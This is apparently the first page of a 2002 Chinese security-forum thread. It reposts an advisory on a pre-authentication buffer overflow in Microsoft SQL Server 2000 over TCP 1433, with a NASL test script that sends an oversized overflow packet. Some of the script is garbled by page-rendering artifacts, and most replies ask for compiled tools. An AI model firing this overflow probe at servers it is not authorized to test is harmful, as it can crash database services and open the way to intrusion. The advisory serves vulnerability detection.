Microsoft SQL Server的一个新远程溢出漏洞

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

■ 回复数：31　◆ 点击数：1211

将此页发给您的朋友

作者

主题: Microsoft SQL Server的一个新远程溢出漏洞 ( 页: 1 2 3 )

回复 | 收藏 | 打印 | 篇末

★帅の蟑螂

级别：管理员
威望：0
经验：20
货币：4114
体力：

来源：127.0.0.1
总发帖数：3059
注册日期：2001-04-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

Microsoft SQL Server预验证过程远程缓冲区溢出漏洞

发布日期：2002-08-06
更新日期：2002-08-07

受影响系统：
Microsoft SQL Server 2000
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Microsoft SQL Server 2000 SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Microsoft SQL Server 2000 SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 5411

Microsoft SQL Server是一款由Microsoft开发的大型数据库系统。

Microsoft SQL Server在预验证处理时存在漏洞，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。

Microsoft SQL Server的预验证过程存在问题，远程攻击者通过连接TCP 1433端口可以进行缓冲区溢出攻击，由于问题发生在验证之前，所以攻击这无需验证就可以进行攻击，可能使攻击者以SQL进程权限在系统上执行任意指令。

目前未知哪个SQL Server版本存在漏洞。

<*来源：Dave Aitel （daitel@atstake.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dave Aitel （daitel@atstake.com）提供了如下NASL脚本测试程序：

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!

if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(englishscreen.width-300)this.width=screen.width-300'>esc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(englishscreen.width-300)this.width=screen.width-300'>ummary["english"]);

script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

if(get_port_state(port))
{
soc = open_sock_tcp(port);

if(soc)
{
#uncomment this to see what normally happens
#attack_string="MSSQLServer";
#uncomment next line to actually test for overflow
attack_string=crap(560);
# this creates a variable called sql_packet
sql_packet = pkt_hdr+attack_string+pkt_tail;
send(socketscreen.width-300)this.width=screen.width-300'>oc, datascreen.width-300)this.width=screen.width-300'>ql_packet);

r = recv(socketscreen.width-300)this.width=screen.width-300'>oc, length:4096);
close(soc);
display ("Result:",r,"\n");
if(!r)
{
display("Security Hole in MSSQL\n");
security_hole(portscreen.width-300)this.width=screen.width-300'>ort, data:report);
}
}
}

建议：
--------------------------------------------------------------------------------
厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

[ 此消息由 ★帅の蟑螂在 2002-09-28.01:38:27 编辑过 ]

----------------------------------------------------------
为了明天奢侈糜烂的生活而奋斗

编辑　

删除　

发表于 2002-09-28.01:36:07　

IP: 已记录

bruceweb 美女哟

级别：长老级
威望：0
经验：0
货币：2518
体力：

来源：天边and海脚
总发帖数：670
注册日期：2002-08-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

帅~~~~·！~

----------------------------------------------------------
嘿！！

编辑　

删除　

发表于 2002-09-28.01:53:22　

IP: 已记录

aychenlong 帅哥哦

级别：老站友
威望：0
经验：0
货币：1301
体力：

来源：netxeyes
总发帖数：272
注册日期：2002-08-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

怎么用呀？那里有下载

----------------------------------------------------------

编辑　

删除　

发表于 2002-09-29.13:34:02　

IP: 已记录

┗⊙⊙┛

级别：骑士
威望：0
经验：1
货币：382
体力：

来源：210.78.135.*
总发帖数：143
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

有没有编译好的程序啊？

编辑　

删除　

发表于 2002-09-29.15:34:33　

IP: 已记录

aychenlong 帅哥哦

级别：老站友
威望：0
经验：0
货币：1301
体力：

来源：netxeyes
总发帖数：272
注册日期：2002-08-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

是呀？

----------------------------------------------------------

编辑　

删除　

发表于 2002-09-29.17:54:31　

IP: 已记录

marduk 帅哥哦

级别：老站友
威望：0
经验：0
货币：1761
体力：

来源：218.7.33.*
总发帖数：437
注册日期：2002-04-23

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

我也要

----------------------------------------------------------
just want to play with you!!

编辑　

删除　

发表于 2002-09-29.19:43:04　

IP: 已记录

leonsu 帅哥哦

级别：新手上路
威望：0
经验：0
货币：113
体力：

来源：广东
总发帖数：2
注册日期：2002-09-24

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

关注中！

编辑　

删除　

发表于 2002-09-30.01:08:14　

IP: 已记录

比格曼

级别：中级站友
威望：0
经验：0
货币：214
体力：

来源：61.183.85.*
总发帖数：38
注册日期：2002-09-29

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

自己编译撒

编辑　

删除　

发表于 2002-09-30.01:26:45　

IP: 已记录

雪狼湖

级别：精灵王
威望：0
经验：2
货币：1832
体力：

来源：61.168.74.*
总发帖数：472
注册日期：2002-01-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谁编好了给俺一个

----------------------------------------------------------

编辑　

删除　

发表于 2002-10-03.01:45:41　

IP: 已记录

tiandia 帅哥哦

级别：一般站友
威望：0
经验：0
货币：194
体力：

来源：211.90.208.*
总发帖数：29
注册日期：2002-07-24

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

在什么系统下编业？

----------------------------------------------------------
hehaj

编辑　

删除　

发表于 2002-10-03.08:52:44　

IP: 已记录

LaserDance 美女哟

级别：中级站友
威望：0
经验：0
货币：611
体力：

来源：netXeyes
总发帖数：84
注册日期：2002-08-22

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

hehe

----------------------------------------------------------

编辑　

删除　

发表于 2002-10-03.09:39:56　

IP: 已记录

龙

级别：老站友
威望：0
经验：0
货币：2044
体力：

来源：福建
总发帖数：444
注册日期：2002-01-24

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谁有编译好的啊

----------------------------------------------------------
我不是高手但我想成为高手

编辑　

删除　

发表于 2002-10-03.11:16:37　

IP: 已记录

bageyalu 帅哥哦

级别：长老级
威望：0
经验：0
货币：911
体力：

来源：广东
总发帖数：835
注册日期：2002-02-25

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

有谁试过了吗？

----------------------------------------------------------
轻轻的我走了，正如我轻轻的来
我挥一挥衣袖，不留下一个IP

编辑　

删除　

发表于 2002-10-03.19:24:48　

IP: 已记录

aychenlong 帅哥哦

级别：老站友
威望：0
经验：0
货币：1301
体力：

来源：netxeyes
总发帖数：272
注册日期：2002-08-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵~~★帅の蟑螂，这是瑞星的文章呀怎么不加转贴？？？

----------------------------------------------------------

编辑　

删除　

发表于 2002-10-03.21:05:47　

IP: 已记录

zzzz_yyyy 帅哥哦

级别：高级站友
威望：0
经验：0
货币：565
体力：

来源：辽宁
总发帖数：147
注册日期：2002-10-05

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

me也想要一个。

编辑　

删除　

发表于 2002-10-06.15:35:39　

IP: 已记录

美度沙

级别：老站友
威望：0
经验：0
货币：953
体力：

来源：61.243.229.*
总发帖数：275
注册日期：2002-10-04

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

无论是哪里的，只要是好的，是有用的就成了

编辑　

删除　

发表于 2002-10-06.18:27:12　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP [第 1 2 3 页]